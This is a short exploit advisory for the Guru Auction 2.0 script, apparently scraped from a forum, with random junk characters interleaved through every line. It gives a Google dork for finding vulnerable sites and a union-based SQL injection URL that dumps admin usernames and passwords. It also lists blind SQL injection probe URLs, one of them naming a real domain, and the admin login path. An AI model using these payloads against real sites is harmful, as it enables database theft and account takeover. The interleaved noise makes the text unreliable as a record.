Guru Auction 2.0 Multiple SQL Injection Vulnerabilities e$ f: w6 }; {1 X2 a1 p m" s
7 Q3 c5 O8 M% W" _
作者 : v3n0m9 s( \6 R' a% s- o9 I
应用 : Guru Auction 2.0, H: s. b( a5 z2 g0 u3 q9 _
Price : $49
6 n" D4 ?! @( X* N' fVendor : http://www.guruscript.com/
: o4 N$ G0 H3 cGoogle Dork : inurl:subcat.php?cate_id=
: c6 \! I) _1 d' N* ] 8 H- a. Y6 N" ^& r- u# Z
SQLi p0c:( n! O: p3 v, I# b! X3 ~
~~~~~~~~~~
+ V3 u3 B* l6 v' {. fhttp://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
( H$ K+ @; a$ O# r1 a
- I" S6 ^0 ?9 z- q0 w5 ~+ N
; X$ k5 a3 Y8 N1 L. {: ?9 Y5 u2 ~盲注 p0c:
& q* F( S2 N4 D9 S! O~~~~~~~~~~
5 X7 S( H* _# r$ k. p; `- nhttp://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
& z* k, G% s7 e3 Yhttp://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
" m% P& V; a/ g: ^7 n8 I
8 U% i. k# h1 f+ i管理登录入口:9 C5 l) q {4 y% f
~~~~~~~~~~: p9 w; v+ c! \( S2 z
http://domain.tld/[path]/admin/, b8 t3 M; i8 [2 R8 H: C
|